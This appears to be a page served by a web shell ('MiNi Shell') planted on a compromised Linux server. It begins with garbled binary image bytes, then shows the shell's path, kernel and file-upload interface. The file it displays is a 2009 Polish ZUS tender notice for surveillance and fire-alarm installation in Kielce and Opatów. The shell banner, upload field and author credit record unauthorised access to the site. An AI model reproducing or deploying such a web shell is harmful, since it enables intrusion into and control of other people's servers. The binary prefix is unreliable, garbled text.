JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090825/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090825/139535-N-2009.html

<p class="kh_header"><b>Kielce: Dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce, modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce oraz modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie  ZUS w Opatowie</b><br>
<b>Numer ogłoszenia: 139535 - 2009; data zamieszczenia: 25.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Kielcach , ul. Piotrkowska 27, 25-510 Kielce, woj. świętokrzyskie, tel. 041 3677100, faks 041 3677391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl/zampub</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce, modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce oraz modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie  ZUS w Opatowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce, modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce oraz modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie  ZUS w Opatowie.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 45.31.43.10-7, 32.32.35.00-8, 51.31.40.00-6, 45.31.21.00-8, 45.31.22.00-9, 35.12.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do udziału w postępowaniu zobowiązany jest do wniesienia wadium w następującej wysokości:
1) 2.500,00 zł (przystępując do zadania 1),
2) 4.000,00 zł (przystępując do zadania 2),
3) 2.000,00 zł (przystępując do zadania 3),<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy wnieśli wadium, nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art. 24 ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (t.jedn. Dz. U. z 2007r. Nr 223 poz. 1655) zwanej dalej u.p.z.p., spełniają warunki zawarte w art. 22 ust. 1 u.p.z.p oraz:
1) zrealizowali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa zamówienia polegające na dostawie wraz z montażem telewizji dozorowej o wartości co najmniej 40.000 zł brutto każda;
Warunek dotyczy wykonawców przystępujących do I części zamówienia - dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce,
2) zrealizowali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa zamówienia polegające na dostawie i montażu instalacji przeciwpożarowej o wartości co najmniej 50.000 zł każda;
Warunek dotyczy wykonawców przystępujących do II części zamówienia - modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce,
3) zrealizowali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej dwa zamówienia polegające na dostawie i montażu instalacji przeciwpożarowej o wartości co najmniej 20.000 zł każda;
Warunek dotyczy wykonawców przystępujących do III części zamówienia - modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie ZUS w Opatowie,
W przypadku złożenia oferty łącznie na część II i III zamówienia wystarczające będzie spełnienie warunku o którym mowa w pkt 2).
 4) dysponują lub przedstawią pisemne zobowiązanie innych podmiotów, że będą dysponować osobami zdolnymi do wykonania zamówienia a w szczególności co najmniej:
a) jedną osobą posiadającą licencję pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (t.j. z 2005r. Dz.U. Nr 145, poz. 1221 ze zm.),
b) jedną osobą posiadającą świadectwo kwalifikacyjne eksploatacji w zakresie remontów lub montażu urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kVA .
W przypadku złożenia oferty na więcej niż jedną część zamówienia, warunek musi zostać spełniony osobno dla każdej części zamówienia. Oznacza to, że składając ofertę na dwie lub trzy części zamówienia, wykonawca musi dysponować, lub przedstawić pisemne zobowiązanie innych podmiotów, że będą dysponować osobami zdolnymi do wykonania zamówienia a w szczególności:
- co najmniej dwiema osobami posiadającymi licencję pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia, oraz dwiema osobami posiadającymi świadectwa kwalifikacyjne eksploatacji w zakresie remontów lub montażu urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kVA, przystępując do dwóch części zamówienia,
- co najmniej trzema osobami posiadającymi licencję pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia, oraz trzema osobami posiadającymi świadectwa kwalifikacyjne eksploatacji w zakresie remontów lub montażu urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kVA, przystępując do trzech części zamówienia.

Ocena spełnienia warunków podanych wyżej odbywać się będzie na podstawie dokumentów i oświadczeń wymienionych niżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane przez Zamawiającego oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1) oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 u.p.z.p. oraz spełnia warunki określone w art. 22 ust. 1 u.p.z.p. (zgodne z załącznikiem nr 3 do SIWZ),
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) wykaz zrealizowanych przez wykonawcę w okresie ostatnich trzech lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zamówień polegających na dostawie wraz z montażem telewizji dozorowej o wartości co najmniej 40.000 zł brutto każda, z podaniem miejsca wykonania dostawy i montażu, wartości i daty dostawy oraz zleceniodawców (zgodny z załącznikiem nr 4a do SIWZ) - przystępując do I części zamówienia.
W wykazie należy wymienić co najmniej dwa zamówienia, których przedmiotem była dostawa wraz z montażem telewizji dozorowej o wartości co najmniej 40.000 zł brutto każda.
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie dostaw wymienionych w wykazie np. referencje.
4) wykaz zrealizowanych przez wykonawcę w okresie ostatnich trzech lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zamówień polegających na dostawie i montażu instalacji przeciwpożarowej o wartości co najmniej 50.000 zł każda, 
z podaniem miejsca wykonania dostawy i montażu, wartości i daty dostawy oraz zleceniodawców (zgodny z załącznikiem nr 4b do SIWZ) - przystępując do II części zamówienia.
W wykazie należy wymienić co najmniej dwa zamówienia, których przedmiotem była dostawa wraz z montażem instalacji przeciwpożarowej o wartości co najmniej 50.000 zł brutto każda.
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie dostaw wymienionych w wykazie np. referencje.
5) wykaz zrealizowanych przez wykonawcę w okresie ostatnich trzech lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zamówień polegających na dostawie i montażu instalacji przeciwpożarowej o wartości co najmniej 20.000 zł każda, 
z podaniem miejsca wykonania dostawy i montażu, wartości i daty dostawy oraz zleceniodawców (zgodny z załącznikiem nr 4c do SIWZ) - przystępując do III części zamówienia.
W wykazie należy wymienić co najmniej dwa zamówienia, których przedmiotem była dostawa wraz z montażem instalacji przeciwpożarowej o wartości co najmniej 20.000 zł brutto każda.
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie dostaw wymienionych w wykazie np. referencje.
6) wykaz osób którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia (zgodny z załącznikiem nr 5 do SIWZ). 
Do wykazu należy dołączyć dokumenty potwierdzające uprawnienia osób wymienionych w wykazie tj.:
a) licencję pracownika zabezpieczenia technicznego co najmniej pierwszego stopnia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (t.j. z 2005r. Dz.U. Nr 145, poz. 1221 ze zm.),
b) świadectwo kwalifikacyjne eksploatacji w zakresie remontów lub montażu urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kVA, wydane na podstawie Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. nr 89 poz. 828 ze zm.),
7) pisemne zobowiązanie innych podmiotów do udostępnienia osób wymienionych w wykazie o którym mowa w pkt. 6), jeżeli wykonawca wskazał w wykazie że osobami tymi będzie dysponował;
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie wymaganych dokumentów i oświadczeń na zasadzie (spełnia / nie spełnia).

Wymagane przez Zamawiającego oświadczenia lub dokumenty potwierdzające spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego: brak..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można otrzymać w pokoju 419 przy ul. Kolberga 2a w Kielcach lub pocztą, po przesłaniu zapotrzebowania na adres ZUS O/Kielce ul. Piotrkowska 27, 25-510 Kielce lub pod nr faksu (041) 3445072.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 10:00, miejsce: Osobiście w pokoju nr 419 w budynku przy ul. Kolberga 2a w Kielcach (IV piętro) lub przesłać na adres: ZUS Oddział w Kielcach ul. Piotrkowska 27, 25-510 Kielce.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem systemu telewizji dozorowej w ZUS Oddział Kielce.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 45.31.43.10-7, 32.32.35.00-8, 51.31.40.00-6, 35.12.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja instalacji przeciwpożarowej w ZUS Oddział Kielce.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 45.31.43.10-7, 45.31.21.00-8, 35.12.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 37.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie ZUS w Opatowie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja systemu sygnalizacji pożaru i włamania w Inspektoracie ZUS w Opatowie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 45.31.43.10-7, 45.31.21.00-8, 45.31.22.00-9, 35.12.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 13.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com